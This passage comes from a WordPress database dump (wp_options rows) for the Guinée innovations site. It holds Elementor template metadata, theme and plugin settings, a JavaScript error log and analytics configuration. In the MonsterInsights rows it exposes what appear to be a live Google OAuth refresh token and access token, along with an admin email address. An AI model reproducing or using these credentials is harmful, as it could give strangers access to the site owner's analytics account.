Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";s:10:\"1508325922\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"118\";s:16:\"popularity_index\";s:3:\"115\";s:11:\"trend_index\";s:2:\"58\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:117;a:12:{s:2:\"id\";s:4:\"2094\";s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";s:10:\"1509621053\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"119\";s:16:\"popularity_index\";s:3:\"116\";s:11:\"trend_index\";s:3:\"102\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:118;a:12:{s:2:\"id\";s:4:\"2120\";s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";s:10:\"1509631820\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"120\";s:16:\"popularity_index\";s:3:\"117\";s:11:\"trend_index\";s:3:\"114\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:119;a:12:{s:2:\"id\";s:4:\"3153\";s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";s:10:\"1508950132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"121\";s:16:\"popularity_index\";s:3:\"109\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:120;a:12:{s:2:\"id\";s:4:\"3338\";s:5:\"title\";s:34:\"Black Friday &#8211; Nature Set​\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";s:10:\"1511203351\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"122\";s:16:\"popularity_index\";s:3:\"110\";s:11:\"trend_index\";s:3:\"115\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:121;a:12:{s:2:\"id\";s:4:\"3339\";s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";s:10:\"1511203636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"123\";s:16:\"popularity_index\";s:2:\"93\";s:11:\"trend_index\";s:2:\"68\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:122;a:12:{s:2:\"id\";s:4:\"3335\";s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";s:10:\"1511203246\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"124\";s:16:\"popularity_index\";s:3:\"107\";s:11:\"trend_index\";s:2:\"97\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:123;a:12:{s:2:\"id\";s:4:\"3340\";s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";s:10:\"1511203713\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"125\";s:16:\"popularity_index\";s:3:\"105\";s:11:\"trend_index\";s:3:\"116\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:124;a:12:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";s:10:\"1475067229\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"126\";s:16:\"popularity_index\";s:1:\"8\";s:11:\"trend_index\";s:1:\"7\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}','no'),(168,'ReduxFrameworkPlugin_ACTIVATED_NOTICES','a:1:{i:0;s:138:\"Redux Framework has an embedded demo. <a href=\"./plugins.php?ReduxFrameworkPlugin=demo\">Click here to activate the sample config file.</a>\";}','yes'),(169,'redux_version_upgraded_from','3.6.7.7','yes'),(170,'_transient_timeout__redux_activation_redirect','1512724746','no'),(171,'_transient__redux_activation_redirect','1','no'),(173,'magzma_framework','a:49:{s:8:\"last_tab\";s:1:\"1\";s:11:\"header_type\";s:7:\"default\";s:11:\"menu_select\";a:2:{s:7:\"use-top\";s:1:\"1\";s:8:\"use-main\";s:1:\"1\";}s:13:\"head_ads_type\";s:12:\"head_ads_img\";s:14:\"head_ads_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:13:\"head_ads_link\";s:0:\"\";s:19:\"head_ads_javascript\";s:0:\"\";s:16:\"topcont_ads_type\";s:15:\"topcont_ads_img\";s:17:\"topcont_ads_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:16:\"topcont_ads_link\";s:0:\"\";s:22:\"topcont_ads_javascript\";s:0:\"\";s:16:\"botcont_ads_type\";s:15:\"botcont_ads_img\";s:17:\"botcont_ads_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:16:\"botcont_ads_link\";s:0:\"\";s:22:\"botcont_ads_javascript\";s:0:\"\";s:11:\"footer_type\";s:7:\"default\";s:13:\"footer-layout\";s:14:\"3widget-footer\";s:11:\"footer-text\";s:177:\"<b style=\"color: #222222; font-family: sans-serif; font-size: 14px;\">©</b>2017 Guinée innovations - Propulsé par  <a href=\"http://www.nimbasolution.com/\">Nimba Solution</a>\";s:9:\"body-font\";a:7:{s:11:\"font-family\";s:4:\"Lato\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:12:\"heading-font\";a:7:{s:11:\"font-family\";s:7:\"Poppins\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"500\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:9:\"menu-font\";a:7:{s:11:\"font-family\";s:7:\"Poppins\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-backup\";s:0:\"\";s:11:\"font-weight\";s:3:\"500\";s:10:\"font-style\";s:0:\"\";s:10:\"text-align\";s:0:\"\";}s:16:\"facebook_profile\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:15:\"twitter_profile\";s:34:\"https://twitter.com/Gn_innovations\";s:14:\"google_profile\";s:0:\"\";s:16:\"linkedin_profile\";s:0:\"\";s:17:\"pinterest_profile\";s:0:\"\";s:15:\"dribble_profile\";s:0:\"\";s:14:\"flickr_profile\";s:0:\"\";s:15:\"behance_profile\";s:0:\"\";s:15:\"youtube_profile\";s:0:\"\";s:18:\"soundcloud_profile\";s:0:\"\";s:15:\"codepen_profile\";s:0:\"\";s:18:\"deviantart_profile\";s:0:\"\";s:12:\"digg_profile\";s:0:\"\";s:15:\"dropbox_profile\";s:0:\"\";s:14:\"github_profile\";s:0:\"\";s:17:\"instagram_profile\";s:0:\"\";s:13:\"skype_profile\";s:0:\"\";s:15:\"spotify_profile\";s:0:\"\";s:13:\"steam_profile\";s:0:\"\";s:14:\"trello_profile\";s:0:\"\";s:14:\"tumblr_profile\";s:0:\"\";s:13:\"vimeo_profile\";s:0:\"\";s:14:\"wechat_profile\";s:0:\"\";s:13:\"weibo_profile\";s:0:\"\";s:17:\"wordpress_profile\";s:0:\"\";s:12:\"xing_profile\";s:0:\"\";s:13:\"yahoo_profile\";s:0:\"\";s:12:\"yelp_profile\";s:0:\"\";}','yes'),(174,'magzma_framework-transients','a:3:{s:14:\"changed_values\";a:1:{s:14:\"head_ads_image\";a:5:{s:3:\"url\";s:90:\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Avec-le-Soutien-du-2.jpg\";s:2:\"id\";s:3:\"917\";s:6:\"height\";s:2:\"75\";s:5:\"width\";s:3:\"728\";s:9:\"thumbnail\";s:97:\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Avec-le-Soutien-du-2-150x75.jpg\";}}s:9:\"last_save\";i:1512719189;s:13:\"last_compiler\";i:1512719189;}','yes'),(180,'wbc_imported_demos','a:1:{s:12:\"wbc-import-7\";a:4:{s:9:\"directory\";s:7:\"demo-07\";s:12:\"content_file\";s:11:\"content.xml\";s:5:\"image\";s:16:\"screen-image.jpg\";s:8:\"imported\";s:8:\"imported\";}}','yes'),(182,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(183,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(184,'_elementor_global_css','a:3:{s:4:\"time\";i:1508766858;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:12;s:11:\"Roboto Slab\";}s:6:\"status\";s:4:\"file\";}','yes'),(187,'breadcrumbs_color','#000000','yes'),(188,'main_header','#205cd6','yes'),(189,'top_menu','#000000','yes'),(194,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(195,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(203,'_transient_timeout_elementor_remote_info_api_data_1.7.11','1508891923','no'),(204,'_transient_elementor_remote_info_api_data_1.7.11','a:2:{s:9:\"timestamp\";i:1508848722;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(267,'_site_transient_timeout_popular_importers_c68fa1edb79dadf9c291434151821529','1509044491','no'),(268,'_site_transient_popular_importers_c68fa1edb79dadf9c291434151821529','a:2:{s:9:\"importers\";a:8:{s:7:\"blogger\";a:4:{s:4:\"name\";s:7:\"Blogger\";s:11:\"description\";s:54:\"Import posts, comments, and users from a Blogger blog.\";s:11:\"plugin-slug\";s:16:\"blogger-importer\";s:11:\"importer-id\";s:7:\"blogger\";}s:9:\"wpcat2tag\";a:4:{s:4:\"name\";s:29:\"Categories and Tags Converter\";s:11:\"description\";s:71:\"Convert existing categories to tags or tags to categories, selectively.\";s:11:\"plugin-slug\";s:18:\"wpcat2tag-importer\";s:11:\"importer-id\";s:10:\"wp-cat2tag\";}s:11:\"livejournal\";a:4:{s:4:\"name\";s:11:\"LiveJournal\";s:11:\"description\";s:46:\"Import posts from LiveJournal using their API.\";s:11:\"plugin-slug\";s:20:\"livejournal-importer\";s:11:\"importer-id\";s:11:\"livejournal\";}s:11:\"movabletype\";a:4:{s:4:\"name\";s:24:\"Movable Type and TypePad\";s:11:\"description\";s:62:\"Import posts and comments from a Movable Type or TypePad blog.\";s:11:\"plugin-slug\";s:20:\"movabletype-importer\";s:11:\"importer-id\";s:2:\"mt\";}s:4:\"opml\";a:4:{s:4:\"name\";s:8:\"Blogroll\";s:11:\"description\";s:28:\"Import links in OPML format.\";s:11:\"plugin-slug\";s:13:\"opml-importer\";s:11:\"importer-id\";s:4:\"opml\";}s:3:\"rss\";a:4:{s:4:\"name\";s:3:\"RSS\";s:11:\"description\";s:30:\"Import posts from an RSS feed.\";s:11:\"plugin-slug\";s:12:\"rss-importer\";s:11:\"importer-id\";s:3:\"rss\";}s:6:\"tumblr\";a:4:{s:4:\"name\";s:6:\"Tumblr\";s:11:\"description\";s:53:\"Import posts &amp; media from Tumblr using their API.\";s:11:\"plugin-slug\";s:15:\"tumblr-importer\";s:11:\"importer-id\";s:6:\"tumblr\";}s:9:\"wordpress\";a:4:{s:4:\"name\";s:9:\"WordPress\";s:11:\"description\";s:96:\"Import posts, pages, comments, custom fields, categories, and tags from a WordPress export file.\";s:11:\"plugin-slug\";s:18:\"wordpress-importer\";s:11:\"importer-id\";s:9:\"wordpress\";}}s:10:\"translated\";b:0;}','no'),(269,'elementor_allow_tracking','no','yes'),(270,'elementor_tracker_notice','1','yes'),(273,'top_social','#777777','yes'),(284,'elementor_debug_log','a:10:{i:0;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1508918083\";s:7:\"message\";s:49:\"Cannot read property \\\'pageYOffset\\\' of undefined\";s:3:\"url\";s:356:\"https://guineeinnove.nimbasolution.com/wp-admin/load-scripts.php?c=0&load%5B%5D=underscore,shortcode,utils,jquery-core,jquery-migrate,backbone,wp-util,wp-backbone,media-models,plupload,wp-plupload,jquery-ui-c&load%5B%5D=ore,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,mediaelement,wp-mediaelement,media-views,media-editor,media-audiovideo&ver=4.8.2\";s:4:\"line\";s:2:\"12\";s:6:\"column\";s:5:\"30811\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:3;}i:1;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509371818\";s:7:\"message\";s:49:\"Cannot read property \\\'removeClass\\\' of undefined\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:6:\"104207\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:4;}i:2;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:3;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:4;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:5;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:6;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:90:\"Element `column` got <null> as `background_overlay_image` value. Expected array or object.\";}}i:7;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1509465111\";s:7:\"message\";s:54:\"An invalid argument supplied as multiple control value\";s:3:\"url\";s:102:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.7.12\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"62980\";s:12:\"customFields\";a:2:{s:8:\"category\";s:18:\"InvalidElementData\";s:3:\"tag\";s:99:\"Element `column` got <null> as `background_overlay_video_fallback` value. Expected array or object.\";}}i:8;a:7:{s:4:\"type\";s:13:\"SecurityError\";s:9:\"timestamp\";s:10:\"1509552437\";s:7:\"message\";s:183:\"Failed to read the \\\'contentDocument\\\' property from \\\'HTMLIFrameElement\\\': Blocked a frame with origin \\\"https://guineeinnove.nimbasolution.com\\\" from accessing a cross-origin frame.\";s:3:\"url\";s:356:\"https://guineeinnove.nimbasolution.com/wp-admin/load-scripts.php?c=0&load%5B%5D=underscore,shortcode,utils,jquery-core,jquery-migrate,backbone,wp-util,wp-backbone,media-models,plupload,wp-plupload,jquery-ui-c&load%5B%5D=ore,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,mediaelement,wp-mediaelement,media-views,media-editor,media-audiovideo&ver=4.8.3\";s:4:\"line\";s:2:\"10\";s:6:\"column\";s:5:\"26888\";s:12:\"customFields\";a:0:{}}i:9;a:7:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1511782320\";s:7:\"message\";s:49:\"Cannot read property \\\'removeClass\\\' of undefined\";s:3:\"url\";s:101:\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/js/editor.min.js?ver=1.8.0\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:6:\"108151\";s:12:\"customFields\";a:0:{}}}','yes'),(316,'widget_do-etfw','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:10:{s:5:\"title\";s:0:\"\";s:21:\"twitter_timeline_type\";s:8:\"username\";s:23:\"twitter_widget_username\";s:14:\"Gn_innovations\";s:17:\"twitter_widget_id\";s:0:\"\";s:20:\"twitter_widget_width\";s:0:\"\";s:21:\"twitter_widget_height\";s:3:\"400\";s:26:\"twitter_widget_tweet_limit\";s:0:\"\";s:20:\"twitter_widget_theme\";s:5:\"light\";s:25:\"twitter_widget_link_color\";s:7:\"#3b94d9\";s:27:\"twitter_widget_border_color\";s:7:\"#f5f5f5\";}}','yes'),(317,'do_etfw_options','a:1:{s:14:\"twitter_script\";s:1:\"1\";}','yes'),(328,'_transient_timeout_custom_facebook_rating_notice_waiting','1511346828','no'),(329,'_transient_custom_facebook_rating_notice_waiting','waiting','no'),(330,'cff_rating_notice','pending','yes'),(332,'recently_activated','a:1:{s:25:\"duplicator/duplicator.php\";i:1512722604;}','yes'),(334,'_transient_timeout_plugin_slugs','1512809085','no'),(335,'_transient_plugin_slugs','a:13:{i:0;s:19:\"akismet/akismet.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";i:3;s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";i:4;s:23:\"elementor/elementor.php\";i:5;s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";i:6;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:7;s:9:\"hello.php\";i:8;s:26:\"popup-by-supsystic/pps.php\";i:9;s:35:\"redux-framework/redux-framework.php\";i:10;s:27:\"trackserver/trackserver.php\";i:11;s:25:\"wp-staging/wp-staging.php\";i:12;s:24:\"wordpress-seo/wp-seo.php\";}','no'),(336,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(340,'cff_page_type','page','yes'),(359,'dpe_fp_widget_ver','3.5.0','yes'),(360,'dpe_fp_widget_db_ver','2','yes'),(361,'widget_dpe_fp_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(364,'far_plugin_settings','a:2:{s:7:\"farfind\";a:2:{i:1;s:49:\"<a href=\"http://www.magzma.com/\">Magzma Theme</a>\";i:2;s:37:\"\n				Powered by WordPress - Built by \";}s:10:\"farreplace\";a:2:{i:1;s:58:\"<a href=\"http://www.nimbasolution.com/\">Nimba Solution</a>\";i:2;s:60:\"\r\n				Cpoyright  Guinée innovations 2017 - Construit par:  \";}}','yes'),(387,'category_children','a:0:{}','yes'),(407,'bg_top','#ffffff','yes'),(408,'top_social_hover','','yes'),(604,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:36:\"admin@guineeinnove.nimbasolution.com\";s:7:\"version\";s:5:\"4.8.4\";s:9:\"timestamp\";i:1511987889;}','no'),(606,'akismet_spam_count','3','yes'),(614,'_amn_mi-lite_last_checked','1512691200','yes'),(615,'monsterinsights_over_time','a:3:{s:17:\"installed_version\";s:5:\"6.2.4\";s:14:\"installed_date\";i:1509462675;s:13:\"installed_pro\";b:0;}','yes'),(616,'monsterinsights_db_version','6.2.0','yes'),(617,'monsterinsights_settings_version','6.0.0','yes'),(618,'monsterinsights_current_version','6.2.4','yes'),(619,'monsterinsights_settings','a:26:{s:17:\"analytics_profile\";i:163802475;s:22:\"analytics_profile_code\";s:14:\"UA-109033166-1\";s:26:\"track_internal_as_outbound\";i:0;s:23:\"track_internal_as_label\";s:0:\"\";s:14:\"track_outbound\";i:1;s:14:\"allow_tracking\";i:0;s:13:\"tracking_mode\";s:9:\"analytics\";s:11:\"events_mode\";s:2:\"js\";s:12:\"demographics\";b:1;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:13:\"anonymize_ips\";b:1;s:17:\"track_download_as\";s:5:\"event\";s:19:\"extensions_of_files\";s:30:\"doc,exe,js,pdf,ppt,tgz,zip,xls\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"tag_links_in_rss\";i:0;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:25:\"enhanced_link_attribution\";i:1;s:11:\"custom_code\";s:0:\"\";s:10:\"debug_mode\";i:0;s:13:\"save_settings\";a:0:{}s:12:\"view_reports\";a:0:{}s:22:\"analytics_profile_name\";s:48:\"Toutes les données du site Web (UA-109033166-1)\";s:13:\"oauth_version\";s:3:\"1.0\";s:13:\"cron_last_run\";i:1509669954;s:17:\"automatic_updates\";s:4:\"none\";}','yes'),(622,'monsterinsights_get_profiles','a:2:{i:100869257;a:4:{s:2:\"id\";s:9:\"100869257\";s:7:\"ua_code\";s:14:\"UA-100869257-1\";s:11:\"parent_name\";s:21:\"http://www.yeyamo.com\";s:5:\"items\";a:1:{i:147869367;a:3:{s:2:\"id\";s:14:\"UA-100869257-1\";s:4:\"name\";s:21:\"http://www.yeyamo.com\";s:5:\"items\";a:1:{i:152697971;a:3:{s:4:\"name\";s:48:\"Toutes les données du site Web (UA-100869257-1)\";s:7:\"ua_code\";s:14:\"UA-100869257-1\";s:2:\"id\";s:9:\"152697971\";}}}}}i:109033166;a:4:{s:2:\"id\";s:9:\"109033166\";s:7:\"ua_code\";s:14:\"UA-109033166-1\";s:11:\"parent_name\";s:37:\"http://guineeinnove.nimbasolution.com\";s:5:\"items\";a:1:{i:162840784;a:3:{s:2:\"id\";s:14:\"UA-109033166-1\";s:4:\"name\";s:37:\"http://guineeinnove.nimbasolution.com\";s:5:\"items\";a:1:{i:163802475;a:3:{s:4:\"name\";s:48:\"Toutes les données du site Web (UA-109033166-1)\";s:7:\"ua_code\";s:14:\"UA-109033166-1\";s:2:\"id\";s:9:\"163802475\";}}}}}}','yes'),(623,'monsterinsights_lite_access_token','a:5:{s:13:\"refresh_token\";s:66:\"1/8mob9vfs4b3XH0-x0njWXOTwTl7PWEPetaBNkmF5A1aBml0Dg363NAHiWfdinJHQ\";s:12:\"access_token\";s:132:\"ya29.Gl0cBenxtbHp6lkLVI-Hi_01M_hFtXkc6T8wvLDplrHcR6wnxrc_cIPUfeAJcmL0kHbL7B2LDwOowEkkEGiQw2ynESN7Om5AYLJP9NCqT8SBO14jsmdVTTnHTODYOQ8\";s:7:\"expires\";i:1512726151;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1512722551;}','yes'),(624,'monsterinsights_lite_refresh_token','1/8mob9vfs4b3XH0-x0njWXOTwTl7PWEPetaBNkmF5A1aBml0Dg363NAHiWfdinJHQ','yes'),(625,'monsterinsights_report_overview_pageviews','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:31:{i:0;a:2:{i:0;s:8:\"20171003\";i:1;s:1:\"0\";}i:1;a:2:{i:0;s:8:\"20171004\";i:1;s:1:\"0\";}i:2;a:2:{i:0;s:8:\"20171005\";i:1;s:1:\"0\";}i:3;a:2:{i:0;s:8:\"20171006\";i:1;s:1:\"0\";}i:4;a:2:{i:0;s:8:\"20171007\";i:1;s:1:\"0\";}i:5;a:2:{i:0;s:8:\"20171008\";i:1;s:1:\"0\";}i:6;a:2:{i:0;s:8:\"20171009\";i:1;s:1:\"0\";}i:7;a:2:{i:0;s:8:\"20171010\";i:1;s:1:\"0\";}i:8;a:2:{i:0;s:8:\"20171011\";i:1;s:1:\"0\";}i:9;a:2:{i:0;s:8:\"20171012\";i:1;s:1:\"0\";}i:10;a:2:{i:0;s:8:\"20171013\";i:1;s:1:\"0\";}i:11;a:2:{i:0;s:8:\"20171014\";i:1;s:1:\"0\";}i:12;a:2:{i:0;s:8:\"20171015\";i:1;s:1:\"0\";}i:13;a:2:{i:0;s:8:\"20171016\";i:1;s:1:\"0\";}i:14;a:2:{i:0;s:8:\"20171017\";i:1;s:1:\"0\";}i:15;a:2:{i:0;s:8:\"20171018\";i:1;s:1:\"0\";}i:16;a:2:{i:0;s:8:\"20171019\";i:1;s:1:\"0\";}i:17;a:2:{i:0;s:8:\"20171020\";i:1;s:1:\"0\";}i:18;a:2:{i:0;s:8:\"20171021\";i:1;s:1:\"0\";}i:19;a:2:{i:0;s:8:\"20171022\";i:1;s:1:\"0\";}i:20;a:2:{i:0;s:8:\"20171023\";i:1;s:1:\"0\";}i:21;a